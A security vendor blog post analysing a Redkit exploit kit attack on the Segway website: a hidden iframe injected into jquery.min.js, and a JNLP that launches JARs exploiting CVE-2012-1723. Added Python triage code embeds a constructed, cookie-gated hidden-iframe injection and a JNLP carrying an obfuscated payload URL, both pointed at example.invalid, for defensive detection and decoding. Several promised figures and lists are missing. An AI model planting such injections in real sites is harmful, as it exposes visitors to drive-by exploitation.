On June 26, we observed an exploit kit attack on the Segway website. Symantec notified Segway of the attack, and Segway has since taken steps to ensure its website is no longer compromised. This blog looks at the details of the attack, which used the Redkit exploit kit.
Code is injected into a jQuery script.
Figure 1. jQuery script with code injection
The malicious code is present in the site's jquery.min.js JavaScript file.
Figure 2. Malicious code in jquery.min.js
The injected JavaScript decodes to a hidden iframe, which redirects the visitor to a landing page. It also sets a cookie after the redirection so that the same visitor is not sent to the landing page (and exploited) a second time; this one-shot behaviour also makes the infection harder to reproduce when analysing the site.
Decodes to:
Figure 3. JavaScript decodes to a malicious iframe
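The following is an added example, not code from the Symantec post or from the Segway site: a small triage script that checks a served copy of jquery.min.js against a pinned clean hash, undoes the two encodings injected code of this kind most often uses (unescape()/decodeURIComponent() over a percent-encoded string, and String.fromCharCode()), and pulls out the hidden iframe and its src. The clean library, the injected tail, the cookie name `_rk` and the host example.invalid are all constructed for the example.

```python
"""Added example (not from the original post): triage an injected jquery.min.js.

Everything below is constructed: a stand-in for the clean library, an injected
tail modelled on the post's description (cookie gate, then an escaped string
that decodes to a 1x1 iframe), a hypothetical cookie name "_rk", and the
reserved host example.invalid.
"""
import hashlib
import re
import urllib.parse

# Constructed stand-in for the clean library. In practice, hash the exact
# jquery.min.js build the site deploys and pin that value.
CLEAN_JQUERY = "/*! jQuery v1.7.2 */(function(a,b){a.jQuery=a.$=b})(window,{});"
KNOWN_GOOD_SHA256 = hashlib.sha256(CLEAN_JQUERY.encode()).hexdigest()

# Constructed injected tail: fire once per visitor (cookie check), then write a
# percent-encoded iframe. It decodes to:
#   <iframe src="http://example.invalid/landing.php" width="1" height="1"
#           style="visibility:hidden"></iframe>
INJECTED_TAIL = (
    'if(document.cookie.indexOf("_rk=")==-1){document.cookie="_rk=1";'
    'document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid'
    '%2Flanding.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22'
    'visibility%3Ahidden%22%3E%3C%2Fiframe%3E"));}'
)
INFECTED_JQUERY = CLEAN_JQUERY + INJECTED_TAIL


def tampered(content: str, known_good_sha256: str = KNOWN_GOOD_SHA256) -> bool:
    """Cheapest check first: does the served file match the pinned clean build?"""
    return hashlib.sha256(content.encode()).hexdigest() != known_good_sha256


def decode_obfuscated_strings(script: str) -> list:
    """Undo the two encodings exploit-kit injections most often use:
    unescape()/decodeURIComponent() of a percent-encoded string, and
    String.fromCharCode() over a list of code points."""
    out = []
    pct = r'(?:unescape|decodeURIComponent)\(\s*["\']([^"\']*)["\']\s*\)'
    for enc in re.findall(pct, script):
        out.append(urllib.parse.unquote(enc))
    for codes in re.findall(r'String\.fromCharCode\(([\d,\s]+)\)', script):
        out.append("".join(chr(int(n)) for n in codes.split(",") if n.strip()))
    return out


def extract_iframes(script: str) -> list:
    """Return the iframes found inside the decoded strings, with their src and
    whether they are sized or styled to be invisible to the visitor."""
    found = []
    hidden_re = (r'(?:width|height)=["\']?[01]["\']?'
                 r'|visibility\s*:\s*hidden|display\s*:\s*none')
    for html in decode_obfuscated_strings(script):
        for tag in re.findall(r'<iframe\b[^>]*>', html, re.I):
            src = re.search(r'\ssrc=["\']([^"\']+)["\']', tag, re.I)
            hidden = bool(re.search(hidden_re, tag, re.I))
            found.append({"src": src.group(1) if src else None, "hidden": hidden})
    return found


def triage(content: str) -> dict:
    """Summarise the evidence an analyst wants from a suspect script."""
    return {
        "tampered": tampered(content),
        "one_shot_cookie": "document.cookie" in content,
        "iframes": extract_iframes(content),
    }


if __name__ == "__main__":
    print(triage(INFECTED_JQUERY))
```

The hash comparison is the check to automate in a deployment pipeline; the decoders are for the analyst's second look once it fails. Note that a cookie-gated injection will only deliver the iframe to a browser that has not visited before, so re-fetching the page from the same analysis browser may show a clean result.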
The iframe redirects to a Redkit landing page:
The landing page uses the Java Network Launch Protocol (JNLP) to load the malicious JAR files. On successful exploitation, the JAR code opens a connection ("Open Connection") and retrieves the payload URL from the "param value=" attribute passed in through JNLP, where it is stored in obfuscated form.
Figure 4. Obfuscated URL received from “param value=”
The encoded string resolves to:
The JNLP script is used to deploy the malicious JAR files on the user's computer.
Figure 5. JNLP script used to deploy malicious JAR files
The URI for the JAR files:
Current JAR file names are two characters long, such as 80.jar, sj.jar, and 7t.jar. These JAR files download an encrypted payload and decrypt it with their own cipher scheme.
The JAR files used in this attack exploit a Java type confusion vulnerability (CVE-2012-1723), which Oracle patched in June 2012; the attack therefore succeeds only against visitors running an outdated Java plugin.
Figure 6. Java type confusion being exploited
The scheme used to decode the URL passed as a param through JNLP is a simple character substitution.
Figure 7. Cipher scheme used to decode URL
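The following is an added example, not Redkit's code or code from the Symantec post, covering the two steps described above: parsing the JNLP that launches the JAR to pull out the jar references and the param value, and undoing a character-substitution scheme to recover the payload URL. Redkit's real substitution table appears only in Figure 7 and is not reproduced here; the table below is a hypothetical stand-in (a fixed permutation of URL characters), the JNLP document is constructed to mirror the structure in Figure 5, and example.invalid is a reserved host name.

```python
"""Added example (not from the original post): recover the payload URL a
Redkit-style JNLP hands to its JAR.

The JNLP is constructed; the two-character jar name follows the pattern
described in the post. The substitution table is a hypothetical stand-in for
Redkit's own scheme (Figure 7), chosen only to show how a fixed character
permutation is inverted.
"""
import random
import re
import string
import xml.etree.ElementTree as ET

# Hypothetical substitution table: a seeded permutation of the characters a URL
# may contain. '&' and quotes are left out so the encoded value stays a valid
# XML attribute. This is NOT Redkit's table.
_ALPHABET = string.ascii_letters + string.digits + ":/.-_?=%"
_shuffled = list(_ALPHABET)
random.Random(2013).shuffle(_shuffled)
ENCODE_TABLE = str.maketrans(_ALPHABET, "".join(_shuffled))
DECODE_TABLE = str.maketrans("".join(_shuffled), _ALPHABET)


def substitute(text: str, table: dict) -> str:
    """Apply a character-substitution table (encode or decode)."""
    return text.translate(table)


PAYLOAD_URL = "http://example.invalid/d/80.bin"  # constructed, reserved host

# Constructed JNLP mirroring Figure 5: the <applet-desc> carries the obfuscated
# payload URL in a <param> that the launched JAR reads and decodes.
SAMPLE_JNLP = f"""<jnlp spec="1.0+" codebase="http://example.invalid/" href="x.jnlp">
  <information><title>j</title><vendor>j</vendor></information>
  <resources>
    <j2se version="1.6+"/>
    <jar href="80.jar" main="true"/>
  </resources>
  <applet-desc name="j" main-class="a.b" width="1" height="1">
    <param name="v" value="{substitute(PAYLOAD_URL, ENCODE_TABLE)}"/>
  </applet-desc>
</jnlp>
"""


def parse_jnlp(xml_text: str) -> dict:
    """Extract codebase, jar hrefs and applet params from a JNLP document."""
    root = ET.fromstring(xml_text)
    return {
        "codebase": root.get("codebase"),
        "jars": [j.get("href") for j in root.iter("jar")],
        "params": {p.get("name"): p.get("value") for p in root.iter("param")},
    }


def recover_payload_urls(xml_text: str) -> list:
    """Decode every param value with the substitution table and keep the ones
    that come out looking like URLs."""
    urls = []
    for value in parse_jnlp(xml_text)["params"].values():
        plain = substitute(value, DECODE_TABLE)
        if plain.startswith(("http://", "https://")):
            urls.append(plain)
    return urls


def is_suspicious_jar_name(name: str) -> bool:
    """Flag the naming patterns noted in the post: two-character names such as
    80.jar or sj.jar, and purely numeric names such as 123.jar."""
    return re.fullmatch(r"(?:[a-z0-9]{2}|\d+)\.jar", name) is not None


def suspicious_jar_names(xml_text: str) -> list:
    return [j for j in parse_jnlp(xml_text)["jars"] if is_suspicious_jar_name(j)]


if __name__ == "__main__":
    print(parse_jnlp(SAMPLE_JNLP))
    print(recover_payload_urls(SAMPLE_JNLP))
```

When working a real sample, the table has to be lifted from the decompiled JAR (the loop shown in Figure 7); once it is known, the same inversion recovers the download URL from any JNLP the kit serves, without executing the JAR.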
Several pieces of malware are dropped in this attack:
Figure 8. Attack scenario
Redkit has been available since early 2012 and still propagates the same way: hacked sites carry a malicious iframe that redirects to the exploit kit landing page, as observed in this case, and plugin-detection scripts then fingerprint the visitor's browser plugins, just as other exploit kits do.
Recently, we have observed landing pages with the following URI patterns:
Redkit has started using a JNLP script to load its JAR files. The JAR files it deploys have numeric names such as 11.jar or 123.jar, are obfuscated, and exploit recent Java vulnerabilities. The payload they fetch is encrypted.
Redkit exploits several Java vulnerabilities:
Redkit is known to drop:
Symantec blocked approximately 150,000 Redkit attacks last month.
Figure 9. Geographical distribution of attacks
North America, Europe, and the former Soviet Union are the most affected regions. The motive for these attacks is generally monetary gain from compromised users. Recently, these attacks have also targeted organizations in order to steal intellectual property.
The good news is that Symantec provides comprehensive protection against Redkit attacks, and customers with up-to-date intrusion prevention and antivirus signatures are protected. Intrusion Prevention scans all network traffic entering and leaving your computer and compares it against a set of attack signatures, protecting users against the most common Internet attacks.
Symantec has the following protection in place to protect customers from this attack:
Intrusion prevention:
Antivirus: